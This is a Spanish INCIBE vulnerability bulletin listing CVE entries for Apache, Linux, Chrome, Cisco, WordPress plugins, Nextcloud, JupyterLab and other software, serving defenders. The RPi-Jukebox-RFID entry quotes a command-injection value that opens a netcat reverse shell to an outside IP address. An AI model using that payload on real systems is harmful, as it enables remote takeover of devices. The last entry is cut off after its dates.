Instituto Nacional de ciberseguridad. Sección Incibe

Boletín de vulnerabilidades

Vulnerabilidades con productos recientemente documentados:

No hay vulnerabilidades nuevas para los productos a los que está suscrito.



Otras vulnerabilidades de los productos a los que usted está suscrito, y cuya información ha sido actualizada recientemente:

  • CVE-2002-0061
    Severidad: ALTA
    Fecha de publicación: 21/03/2002
    Fecha de última actualización: 26/01/2024
    El servidor Apache, en sus verisones para Win32 1.3.24 y anteriores, y 2.0.x hasta la 2.0.34-beta, permite que atacantes remotos ejecuten cualquier comando a través del metacaracter "|" de la shell. Estos comandos vienen como argumentos a scrips .bat o .cmd. A su vez estos scripts pasan sin filtrado al intérprete de shell, normalmente cmd.exe
  • CVE-2004-0427
    Severidad: BAJA
    Fecha de publicación: 07/07/2004
    Fecha de última actualización: 26/01/2024
    La función do_fork en Linux 2.4.x y 2.6.x no decrementa el contador mm_count cuando un error ocurre después de que se haya activado mm_struct de un proceso hijo, lo que dispara una fuga de memoria que permite a usarios locales causar una denegación de servicio (consumición de memoria).
  • Vulnerabilidad en el demonio Virtual Network Terminal Server para Logical Domains (CVE-2009-2282)
    Severidad: MEDIA
    Fecha de publicación: 01/07/2009
    Fecha de última actualización: 26/01/2024
    El demonio Virtual Network Terminal Server (vntsd) para Logical Domains (también conocido como LDoms) en Sun Solaris 10, OpenSolaris snv_41 a la snv_108, sobre plataformas SPARC no validan la autorización para el acceso como invitado a la consola, lo que permite a los controladores de dominio locales obtener privilegios como invitado del dominio a través de vectores no especificados.
  • Vulnerabilidad en Home FTP Server (CVE-2009-4053)
    Severidad: MEDIA
    Fecha de publicación: 23/11/2009
    Fecha de última actualización: 26/01/2024
    Múltiples vulnerabilidades de salto de directorio en Home FTP Server v1.10.1.139 permiten a usuarios autenticados remtos (1) crear directorios de su elección a través de secuencias de salto de directorio en un comando MKD o (2) crear ficheros con cualquier contenido en directorios de su elección a través de secuencias de salto de directorio en una petición de subida de fichero. NOTA: el origen de esta información es desconocido; los detalles han sido obtenidos únicamente de información de terceras partes.
  • Vulnerabilidad en _functions.php de cpCommerce (CVE-2009-1936)
    Severidad: MEDIA
    Fecha de publicación: 05/06/2009
    Fecha de última actualización: 26/01/2024
    _functions.php de cpCommerce v.1.2.x, posiblemente incluyendo la 1.2.9, envía una redirección pero no finaliza cuando es llamado directamente, lo que permite a atacantes remotos evitar el mecanismo de protección para evitar los ataques de inclusión de ficheros remotos y de salto de directorio, ejecutar código PHP o leer archivos de su elección, a través del parámetro GLOBALS[prefix], un vector de ataque diferente al CVE-2003-1500.
  • Vulnerabilidad en Lintian (CVE-2009-4013)
    Severidad: ALTA
    Fecha de publicación: 02/02/2010
    Fecha de última actualización: 26/01/2024
    Múltiples vulnerabilidades de salto de directorio en Lintian v1.23.x anterior a v1.23.28, v1.24.x anterior a v1.24.2.1, y v2.x anterior a v2.3.2 permite a atacantes remotos sobreescribir archivos a su elección u obtener información sensible a través de vectores que implican (1)nombres de los campos de control, (2)valores de los campos de control, y (3)archivos de control de los sistemas de revisión.
  • Vulnerabilidad en Golden FTP Server Free y Professional (CVE-2009-4194)
    Severidad: MEDIA
    Fecha de publicación: 03/12/2009
    Fecha de última actualización: 26/01/2024
    Vulnerabilidad de salto de directorio en Golden FTP Server v4.30 Free y Professional v4.50, y posiblemente otras versiones, permiten a usuarios autenticados remotamente eliminar archivos de su elección a través de un ..(punto punto) en el comando DELE. NOTA: algunos de estos detalles son obtenidos a partir de información de terceros.
  • Vulnerabilidad en libtransmissionmetainfo.c en Transmission (CVE-2010-0012)
    Severidad: MEDIA
    Fecha de publicación: 08/01/2010
    Fecha de última actualización: 26/01/2024
    Vulnerabilidad de salto de directorio en libtransmission/metainfo.c en Transmission v1.22, v1.34, v1.75, y v1.76 permite a atacantes remotos sobreescribir ficheros de su elección a través de .. (punto punto) en un nombre de ruta con un fichero .torrent
  • Vulnerabilidad en Google Chrome (CVE-2015-1241)
    Severidad: MEDIA
    Fecha de publicación: 19/04/2015
    Fecha de última actualización: 26/01/2024
    Google Chrome anterior a 42.0.2311.90 no considera correctamente la interacción de la navegación de páginas con el manejo de los eventos 'táctiles' (touch) y los eventos de 'gestos' (gesture), lo que permite a atacantes remotos provocar acciones no intencionadas de la interfaz del usuario a través de un sitio web manipulado que realiza un ataque de 'tapjacking'.
  • Vulnerabilidad en Kerio Connect (CVE-2017-7440)
    Severidad: MEDIA
    Fecha de publicación: 02/05/2017
    Fecha de última actualización: 26/01/2024
    Kerio Connect 8.0.0 a 9.2.2 y la aplicación de escritorio Kerio Connect Client para Windows y Mac 9.2.0 a 9.2.2, cuando la vista previa de correo electrónico está habilitada, permite a atacantes remotos realizar ataques de clickjacking a través de un mensaje de correo electrónico.
  • Vulnerabilidad en Intel AMT (CVE-2017-5697)
    Severidad: MEDIA
    Fecha de publicación: 14/06/2017
    Fecha de última actualización: 26/01/2024
    Protección insuficiente contra el secuestro de la acción click en la Interfaz de usuario web de Intel AMT versiones de firmware anteriores a 9.1.40.1000, 9.5.60.1952, 10.0.50.1004, 11.0.0.1205 y 11.6.25.1129, que potencialmente permiten a un atacante remoto secuestrar los cliqueos web de los usuarios por medio de la página web especialmente diseñada.
  • Vulnerabilidad en OpenSSL (CVE-2016-8610)
    Severidad: MEDIA
    Fecha de publicación: 13/11/2017
    Fecha de última actualización: 26/01/2024
    Se ha encontrado un fallo de denegación de servicio en OpenSSL en las versiones 0.9.8, 1.0.1, 1.0.2 hasta la 1.0.2h y la 1.1.0 en la forma en la que el protocolo TLS/SSL definió el procesamiento de paquetes ALERT durante una negociación de conexión. Un atacante remoto podría emplear este fallo para hacer que un servidor TLS/SSL consuma una cantidad excesiva de recursos de CPU y fracase a la hora de aceptar conexiones de otros clientes.
  • Vulnerabilidad en Hammer CLI para Foreman (CVE-2017-2667)
    Severidad: MEDIA
    Fecha de publicación: 12/03/2018
    Fecha de última actualización: 26/01/2024
    Hammer CLI, una utilidad CLI para Foreman, en versiones anteriores a la 0.10.0, no estableció explícitamente la marca verify_ssl para apipie-bindings que lo deshabilita por defecto. Como resultado, los certificados del servidor no se comprueban y las conexiones son propensas a ataques Man-in-the-Middle (MitM).
  • Vulnerabilidad en slp.c en el complemento del protocolo MSN en libpurple en Pidgin y Adium (CVE-2010-0013)
    Severidad: MEDIA
    Fecha de publicación: 09/01/2010
    Fecha de última actualización: 26/01/2024
    Vulnerabilidad de salto de directorio en slp.c en el complemento del protocolo MSN en libpurple en Pidgin v2.6.4 y Adium v1.3.8 permite a atacantes remotos leer ficheros de su elección a través de un .. (punto punto) en una petición emoticono MSN application/x-msnmsgrp2p (también conocido como emoticono personalizado), un caso relaciona con CVE-2004-0122. Se podría decir que es el resultado de una vulnerabilidad en ña que un emoticono descarga peticiones es procesado incluso sin un mensaje que preceda text/x-mms-emoticon que anunció la disponibilidad del emoticono.
  • Vulnerabilidad en Garbage Collection (CVE-2023-5997)
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/11/2023
    Fecha de última actualización: 26/01/2024
    Use after free en Garbage Collection en Google Chrome anterior a 119.0.6045.159 permitía a un atacante remoto explotar potencialmente la corrupción del heap a través de una página HTML manipulada. (Severidad de seguridad de Chrome: alta)
  • Vulnerabilidad en Google Chrome (CVE-2023-6112)
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/11/2023
    Fecha de última actualización: 26/01/2024
    Use after free en Navegación en Google Chrome anterior a 119.0.6045.159 permitía a un atacante remoto explotar potencialmente la corrupción del heap a través de una página HTML manipulada. (Severidad de seguridad de Chrome: alta)
  • Vulnerabilidad en Cisco Identity Services Engine (CVE-2024-20251)
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/01/2024
    Fecha de última actualización: 26/01/2024
    Una vulnerabilidad en la interfaz de administración basada en web de Cisco Identity Services Engine (ISE) podría permitir que un atacante remoto autenticado realice un ataque de cross site scripting (XSS) almacenado contra un usuario de la interfaz en un dispositivo afectado. Esta vulnerabilidad existe porque la interfaz de administración basada en web no valida adecuadamente la entrada proporcionada por el usuario. Un atacante podría aprovechar esta vulnerabilidad inyectando código malicioso en páginas específicas de la interfaz. Una explotación exitoso podría permitir al atacante ejecutar código de script arbitrario en el contexto de la interfaz afectada o acceder a información confidencial basada en el navegador.
  • Vulnerabilidad en Cisco BroadWorks Application Delivery Platform y Cisco BroadWorks Xtended Services Platform (CVE-2024-20270)
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/01/2024
    Fecha de última actualización: 26/01/2024
    Una vulnerabilidad en la interfaz de administración basada en web de Cisco BroadWorks Application Delivery Platform y Cisco BroadWorks Xtended Services Platform podría permitir que un atacante remoto autenticado lleve a cabo un ataque de cross site scripting (XSS) almacenado contra un usuario de la interfaz. Esta vulnerabilidad existe porque la interfaz de administración basada en web no valida adecuadamente la entrada proporcionada por el usuario. Un atacante podría aprovechar esta vulnerabilidad persuadiendo a un usuario de la interfaz para que haga clic en un enlace manipulado. Una explotación exitoso podría permitir al atacante ejecutar código de script arbitrario en el contexto de la interfaz afectada o acceder a información confidencial basada en el navegador.
  • Vulnerabilidad en Cisco WAP371 Wireless-AC/N Dual Radio Access Point (CVE-2024-20287)
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/01/2024
    Fecha de última actualización: 26/01/2024
    Una vulnerabilidad en la interfaz de administración basada en web de Cisco WAP371 Wireless-AC/N Dual Radio Access Point con Single Point Setup podría permitir que un atacante remoto autenticado realice ataques de inyección de comandos contra un dispositivo afectado. Esta vulnerabilidad se debe a una validación inadecuada de la entrada proporcionada por el usuario. Un atacante podría aprovechar esta vulnerabilidad enviando solicitudes HTTP manipuladas a la interfaz de administración basada en web de un sistema afectado. Una explotación exitosa podría permitir al atacante ejecutar comandos arbitrarios con privilegios de root en el dispositivo. Para aprovechar esta vulnerabilidad, el atacante debe tener credenciales administrativas válidas para el dispositivo.
  • Vulnerabilidad en Creditcoin (CVE-2024-22410)
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/01/2024
    Fecha de última actualización: 26/01/2024
    Creditcoin es una red que permite transacciones de crédito entre blockchain. El binario de Windows del nodo Creditcoin carga un conjunto de archivos DLL proporcionados por Microsoft al inicio. Si un usuario malintencionado tiene acceso para sobrescribir el directorio de archivos del programa, es posible reemplazar estas DLL y ejecutar código arbitrario. La opinión del equipo de desarrollo de blockchain es que la amenaza que plantea un hipotético ataque de plantación binaria es mínima y representa un riesgo de baja seguridad. Los archivos DLL vulnerables provienen del subsistema de red de Windows, el runtime de Visual C++ y primitivas criptográficas de bajo nivel. En conjunto, estas dependencias son necesarias para un gran ecosistema de aplicaciones, que van desde aplicaciones de seguridad de nivel empresarial hasta motores de juegos, y no representan una falta fundamental de seguridad o supervisión en el diseño e implementación de Creditcoin. El equipo de blockchain adopta la postura de que ejecutar Creditcoin en Windows no es oficialmente compatible y, en el mejor de los casos, debería considerarse experimental.
  • Vulnerabilidad en flaskBlog (CVE-2024-22414)
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/01/2024
    Fecha de última actualización: 26/01/2024
    flaskBlog es una aplicación de blog sencilla creada con Flask. El almacenamiento y la representación inadecuados de la página `/user/` permiten que los comentarios de un usuario ejecuten código javascript arbitrario. La plantilla html `user.html` contiene el siguiente fragmento de código para representar los comentarios realizados por un usuario: `{{comment[2]|safe}}` . El uso de la etiqueta "safe" hace que flask _not_ escape del contenido renderizado. Para remediar esto, simplemente elimine la etiqueta `|safe` del HTML anterior. No hay ninguna solución disponible y se recomienda a los usuarios que editen manualmente su instalación.
  • Vulnerabilidad en servidor X.Org (CVE-2023-6816)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    Se encontró un fallo en el servidor X.Org. Tanto DeviceFocusEvent como la respuesta de XIQueryPointer contienen un bit para cada botón lógico actualmente presionado. Los botones se pueden asignar arbitrariamente a cualquier valor hasta 255, pero el servidor X.Org solo asignaba espacio para la cantidad particular de botones del dispositivo, lo que provocaba un desbordamiento de búfer en la región Heap de la memoria si se usaba un valor mayor.
  • Vulnerabilidad en IDMSistemas QSige (CVE-2024-0580)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    Omisión de autorización de clave controlada por el usuario en la plataforma IDMSistemas, afectando el producto QSige. Esta vulnerabilidad permite a un atacante extraer información confidencial de la API realizando una solicitud al parámetro '/qsige.locator/quotePrevious/centers/X', donde X admite los valores 1,2,3, etc.
  • Vulnerabilidad en Plone CMS (CVE-2024-0669)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    Se ha encontrado una vulnerabilidad de Cross-Frame Scripting en Plone CMS que afecta a la versión inferior a 6.0.5. Un atacante podría almacenar una URL maliciosa para que la abra un administrador y ejecutar un elemento iframe malicioso.
  • Vulnerabilidad en kernel openEuler en Linux (CVE-2021-33631)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    La vulnerabilidad de desbordamiento de enteros o envoltura en el kernel openEuler en Linux (módulos del sistema de archivos) permite el desbordamiento de enteros forzado. Este problema afecta al kernel de openEuler: desde 4.19.90 antes de 4.19.90-2401.3, desde 5.10.0-60.18.0 antes de 5.10.0-183.0 .0.
  • Vulnerabilidad en kernel de Linux (CVE-2024-0607)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    Se encontró una falla en el subsistema Netfilter en el kernel de Linux. El problema está en la función nft_byteorder_eval(), donde el código itera a través de un bucle y escribe en la matriz `dst`. En cada iteración, se escriben 8 bytes, pero `dst` es una matriz de u32, por lo que cada elemento solo tiene espacio para 4 bytes. Eso significa que cada iteración sobrescribe parte del elemento anterior, lo que posiblemente lleve a una escritura fuera de los límites. Esta falla permite que un usuario local provoque una denegación de servicio o potencialmente aumente sus privilegios en el sistema.
  • Vulnerabilidad en Skoda Automotive (CVE-2023-28900)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    La nube de Skoda Automotive contiene una vulnerabilidad de control de acceso roto, que permite obtener apodos y otros identificadores de usuario de los usuarios del servicio Skoda Connect especificando un número VIN arbitrario del vehículo.
  • Vulnerabilidad en Vyper (CVE-2024-22419)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    Vyper es un lenguaje de contrato inteligente pitónico para la máquina virtual Ethereum. El `concat` integrado puede escribir sobre los límites del búfer de memoria que se le asignó y así sobrescribir los datos válidos existentes. La causa principal es que `build_IR` para `concat` no se adhiere correctamente a la API de funciones de copia (para `>=0.3.2` la función `copy_bytes`). Se realizó una búsqueda de contratos y no se encontraron contratos vulnerables en producción. El desbordamiento de búfer puede provocar un cambio en la semántica del contrato. El desbordamiento depende de la longitud y, por lo tanto, puede pasar desapercibido durante las pruebas del contrato. Sin embargo, ciertamente no todos los usos de concat darán como resultado la sobrescritura de datos válidos, ya que requerimos que estén en una función interna y cerca de la declaración de devolución donde no ocurren otras asignaciones de memoria. Este problema se solucionó en el commit `55e18f6d1` que se incluirá en versiones futuras. Se recomienda a los usuarios que actualicen cuando sea posible.
  • Vulnerabilidad en Nextcloud User Saml (CVE-2024-22400)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    Nextcloud User Saml es una aplicación para autenticar a los usuarios de Nextcloud mediante SAML. En las versiones afectadas, a los usuarios se les puede proporcionar un enlace al servidor de Nextcloud y terminar en un servidor de terceros no controlado. Se recomienda actualizar la aplicación User Saml a la versión 5.1.5, 5.2.5 o 6.0.1. No se conocen workarounds para este problema.
  • Vulnerabilidad en Nextcloud (CVE-2024-22403)
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2024
    Fecha de última actualización: 26/01/2024
    El servidor Nextcloud es un sistema de nube personal autohospedado. En las versiones afectadas, los códigos OAuth no caducaban. Cuando un atacante tuviera acceso a un código de autorización, podría autenticarse en cualquier momento utilizando el código. A partir de la versión 28.0.0, los códigos OAuth se invalidan después de 10 minutos y ya no se autenticarán. Para aprovechar esta vulnerabilidad, un atacante necesitaría interceptar un código OAuth de una sesión de usuario. Se recomienda actualizar el servidor Nextcloud a 28.0.0. No se conocen workarounds para esta vulnerabilidad.
  • Vulnerabilidad en Stripe Payment Plugin for WooCommerce para WordPress (CVE-2024-0705)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    El complemento Stripe Payment Plugin for WooCommerce para WordPress es vulnerable a la inyección SQL a través del parámetro 'id' en todas las versiones hasta la 3.7.9 incluida debido a un escape insuficiente en el parámetro proporcionado por el usuario y a la falta de preparación suficiente en la consulta SQL existente. Esto hace posible que atacantes no autenticados agreguen consultas SQL adicionales a consultas ya existentes que pueden usarse para extraer información confidencial de la base de datos.
  • Vulnerabilidad en MiczFlor RPi-Jukebox-RFID (CVE-2024-0714)
    Severidad: MEDIA
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    Se encontró una vulnerabilidad en MiczFlor RPi-Jukebox-RFID hasta 2.5.0. Ha sido calificada como crítica. Una función desconocida del archivo userScripts.php del componente HTTP Request Handler es afectada por esta vulnerabilidad. La manipulación de la carpeta de argumentos con la entrada ;nc 104.236.1.147 4444 -e /bin/bash; conduce a la inyección de comando del sistema operativo. El ataque puede lanzarse de forma remota. El exploit ha sido divulgado al público y puede utilizarse. El identificador de esta vulnerabilidad es VDB-251540. NOTA: Se contactó primeramente con el proveedor sobre esta divulgación, pero no respondió de ninguna manera.
  • Vulnerabilidad en FreeRDP (CVE-2024-22211)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    FreeRDP es un conjunto de librerías y clientes de protocolos de escritorio remoto gratuitos y de código abierto. En las versiones afectadas, un desbordamiento de enteros en `freerdp_bitmap_planar_context_reset` provoca un desbordamiento de búfer de almacenamiento dinámico. Esto afecta a los clientes basados en FreeRDP. Las implementaciones de servidor y proxy basadas en FreeRDP no se ven afectadas. Un servidor malicioso podría preparar un `RDPGFX_RESET_GRAPHICS_PDU` para asignar búferes demasiado pequeños, lo que posiblemente desencadenaría posteriormente una lectura/escritura fuera de los límites. La extracción de datos a través de la red no es posible; los búferes se utilizan para mostrar una imagen. Este problema se solucionó en las versiones 2.11.5 y 3.2.0. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad.
  • Vulnerabilidad en changetection.io (CVE-2024-23329)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    changetection.io es una herramienta de código abierto diseñada para monitorizar sitios web en busca de cambios de contenido. En las versiones afectadas, cualquier usuario no autorizado puede acceder al endpoint API `/api/v1/watch//history`. Como resultado, cualquier usuario no autorizado puede comprobar su historial de reproducciones. Sin embargo, debido a que la parte no autorizada primero necesita conocer un UUID de vigilancia, y el punto final del historial de vigilancia solo devuelve rutas a la instantánea en el servidor, el impacto en la privacidad de los datos de los usuarios es mínimo. Este problema se solucionó en la versión 0.45.13. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad.
  • Vulnerabilidad en Anomali Match (CVE-2023-49329)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    Anomali Match anterior a 4.6.2 permite la inyección de comandos del sistema operativo. Un usuario administrador autenticado puede inyectar y ejecutar comandos del sistema operativo. Esto surge del manejo inadecuado de entradas que no son de confianza, lo que permite a un atacante elevar privilegios, ejecutar comandos del sistema y potencialmente comprometer el sistema operativo subyacente. Las versiones fijas son 4.4.5, 4.5.4 y 4.6.2. La primera versión afectada es la 4.3.
  • Vulnerabilidad en JupyterLab (CVE-2024-22420)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    JupyterLab es un entorno extensible para informática interactiva y reproducible, basado en Jupyter Notebook y Architecture. Esta vulnerabilidad depende de la interacción del usuario al abrir un archivo Markdown malicioso utilizando la función de vista previa de JupyterLab. Un usuario malintencionado puede acceder a cualquier dato a los que tenga acceso el usuario atacado, así como realizar solicitudes arbitrarias actuando como el usuario atacado. Se ha parcheado la versión 4.0.11 de JupyterLab. Se recomienda a los usuarios que actualicen. Los usuarios que no puedan actualizar deben desactivar la extensión de la tabla de contenido.
  • Vulnerabilidad en JupyterLab (CVE-2024-22421)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    JupyterLab es un entorno extensible para informática interactiva y reproducible, basado en Jupyter Notebook y Architecture. Los usuarios de JupyterLab que hacen clic en un enlace malicioso pueden exponer sus tokens de "Autorización" y "XSRFToken" a un tercero cuando ejecutan una versión anterior de "jupyter-server". Las versiones 4.1.0b2, 4.0.11 y 3.6.7 de JupyterLab están parcheadas. No se ha identificado ningún workaround; sin embargo, los usuarios deben asegurarse de actualizar `jupyter-server` a la versión 2.7.2 o posterior, que incluye una solución de vulnerabilidad de redireccionamiento.
  • Vulnerabilidad en Enonic XP (CVE-2024-23679)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    Las versiones de Enonic XP inferiores a 7.7.4 son vulnerables a un problema de reparación de sesión. Un atacante remoto y no autenticado puede utilizar sesiones anteriores debido a la falta de atributos de sesión invalidantes.
  • Vulnerabilidad en AWS Encryption SDK para Java (CVE-2024-23680)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    AWS Encryption SDK para Java, versiones 2.0.0 a 2.2.0 y anteriores a 1.9.0, valida incorrectamente algunas firmas ECDSA no válidas.
  • Vulnerabilidad en DecodeFromBytes en com.upokecenter.cbor (CVE-2024-23684)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    La complejidad algorítmica ineficiente en la función DecodeFromBytes en com.upokecenter.cbor la implementación Java de Concise Binary Object Representation (CBOR) versiones 4.0.0 a 4.5.1 permite a un atacante provocar una denegación de servicio al pasar una entrada manipulada con fines malintencionados. Dependiendo del uso de esta librería por parte de una aplicación, este puede ser un atacante remoto.
  • Vulnerabilidad en mod-remote-storage (CVE-2024-23685)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    Las credenciales codificadas en las versiones mod-remote-storage inferiores a 1.7.2 y 2.0.0 a 2.0.3 permiten a usuarios no autorizados obtener acceso de lectura a registros mod-inventory-storage, incluidas instancias, existencias, artículos, tipos de contribuyentes y tipos de identificadores.
  • Vulnerabilidad en DependencyCheck para Maven y para Ant (CVE-2024-23686)
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/01/2024
    Fecha de última actualización: 26/01/2024
    DependencyCheck para Maven 9.0.0 a 9.0.6, para la Interfaz de Línea de Comandos (CLI) versión 9.0.0 a 9.0.5 y para Ant versiones 9.0.0 a 9.0.5, cuando se usa en modo de depuración, permite a un atacante recuperar la clave API NVD de un archivo de registro.
  • Vulnerabilidad en NCR Terminal Handler v.1.5.1 (CVE-2023-47024)
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/01/2024
    Fecha de última actualización: 26/01/2024
    Vulnerabilidad de Cross Site Request Forgery en NCR Terminal Handler v.1.5.1 permite a un atacante remoto obtener información confidencial y escalar privilegios a través de un script manipulado al componente UserSelfService.
  • Vulnerabilidad en VK Block Patterns para WordPress (CVE-2024-0623)
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/01/2024
    Fecha de última actualización: 26/01/2024
    El complemento VK Block Patterns para WordPress es vulnerable a Cross-Site Request Forgery en todas las versiones hasta la 1.31.1.1 incluida. Esto se debe a una validación nonce faltante o incorrecta en la función vbp_clear_patterns_cache(). Esto hace posible que atacantes no autenticados borre el caché de patrones a través de una solicitud falsificada, siempre que puedan engañar al administrador del sitio para que realice una acción como hacer clic en un enlace.
  • Vulnerabilidad en ColorMag para WordPress (CVE-2024-0679)
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/01/2024
    Fecha de última actualización: 26/01/2024
    El tema ColorMag para WordPress es vulnerable al acceso no autorizado debido a una falta de verificación de capacidad en la función plugin_action_callback() en todas las versiones hasta la 3.1.2 incluida. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, instalen y activen complementos arbitrarios.
  • Vulnerabilidad en go4rayyan Scumblr (CVE-2016-15037)
    Severidad: BAJA
    Fecha de publicación: 21/01/2024
    Fecha de última actualización: 26/01/2024
    Una vulnerabilidad clasificada como problemática fue encontrada en go4rayyan Scumblr hasta 2.0.1a. Una función desconocida del componente Task Handler es afectada por esta vulnerabilidad. La manipulación conduce a cross site scripting. El ataque puede lanzarse de forma remota. La actualización a la versión 2.0.2 puede solucionar este problema. El parche se identifica como 5c9120f2362ddb7cbe48f2c4620715adddc4ee35. Se recomienda actualizar el componente afectado. VDB-251570 es el identificador asignado a esta vulnerabilidad.
  • Vulnerabilidad en OpenAPI loader in Embedchain (CVE-2024-23731)
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/01/2024
    Fecha de última actualización: 26/01/2024
    OpenAPI loader in Embedchain anterior a 0.1.57 permite a los atacantes ejecutar código arbitrario, relacionado con el argumento de la función openapi.py yaml.load.
  • Vulnerabilidad en JSON loader in Embedchain (CVE-2024-23732)
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/01/2024
    Fecha de última actualización: 26/01/2024
    JSON loader in Embedchain anterior a 0.1.57 permite un ReDoS (denegación de servicio de expresión regular) a través de una cadena larga en json.py.
  • Vulnerabilidad en Dremio (CVE-2024-23768)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    Dremio anterior a 24.3.1 permite path traversal. Un usuario autenticado que no tiene privilegios en determinadas carpetas (y en los archivos y conjuntos de datos de estas carpetas) puede acceder a estas carpetas, archivos y conjuntos de datos. Para tener éxito, el usuario debe tener acceso a la fuente y al menos a una carpeta en la fuente. Las versiones afectadas son: 24.0.0 a 24.3.0, 23.0.0 a 23.2.3 y 22.0.0 a 22.2.2. Las versiones fijas son: 24.3.1 y posteriores, 23.2.4 y posteriores, y 22.2.3 y posteriores.
  • Vulnerabilidad en darkhttpd de GitHub (CVE-2024-23770)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    darkhttpd hasta 1.15 permite a los usuarios locales descubrir credenciales (para --auth) enumerando procesos y sus argumentos.
  • Vulnerabilidad en darkhttpd de GitHub (CVE-2024-23771)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    darkhttpd anterior a 1.15 usa strcmp (que no es un tiempo constante) para verificar la autenticación, lo que facilita a atacantes remotos eludir la autenticación a través de un canal lateral de temporización.
  • Vulnerabilidad en Technicolor TC8715D (CVE-2023-47352)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    Los dispositivos Technicolor TC8715D tienen contraseñas de seguridad WPA2 predeterminadas y predecibles. Un atacante que busque valores SSID y BSSID puede predecir estas contraseñas.
  • Vulnerabilidad en DedeCMS 5.7.112 (CVE-2024-22895)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    DedeCMS 5.7.112 tiene una vulnerabilidad de carga de archivos a través de uploads/dede/module_upload.php.
  • Vulnerabilidad en v (CVE-2023-6290)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    El complemento SEOPress de WordPress anterior a 7.3 no sanitiza ni escapa a algunas de sus configuraciones, lo que podría permitir a usuarios con altos privilegios, como el administrador, realizar ataques de Cross-Site Scripting incluso cuando unfiltered_html no está permitido.
  • Vulnerabilidad en WP User Profile Avatar de WordPress (CVE-2023-6384)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    El complemento WP User Profile Avatar de WordPress anterior a 1.0.1 no verifica correctamente la autorización, lo que permite a los autores eliminar y actualizar avatares arbitrarios.
  • Vulnerabilidad en EventPrime de WordPress (CVE-2023-6447)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    El complemento EventPrime de WordPress anterior a 3.3.6 carece de autenticación y autorización, lo que permite a visitantes no autenticados acceder a eventos privados y protegidos con contraseña adivinando su identificación numérica/nombre del evento.
  • Vulnerabilidad en Product Inquiry for WooCommerce de WordPress (CVE-2023-6625)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    El complemento Product Inquiry for WooCommerce de WordPress anterior a 3.1 no tiene una verificación CSRF implementada al eliminar consultas, lo que podría permitir a los atacantes hacer que un administrador que haya iniciado sesión las elimine mediante un ataque CSRF.
  • Vulnerabilidad en Product Inquiry for WooCommerce de WordPress (CVE-2023-6626)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    El complemento Product Inquiry for WooCommerce de WordPress anterior a 3.1 no sanitiza ni escapa a algunas de sus configuraciones, lo que podría permitir a usuarios con privilegios elevados, como el administrador, realizar ataques de Cross-Site Scripting Almacenado incluso cuando la capacidad unfiltered_html no está permitida (por ejemplo, en una configuración multisitio).
  • Vulnerabilidad en Import any XML or CSV File to WordPress (CVE-2023-7082)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
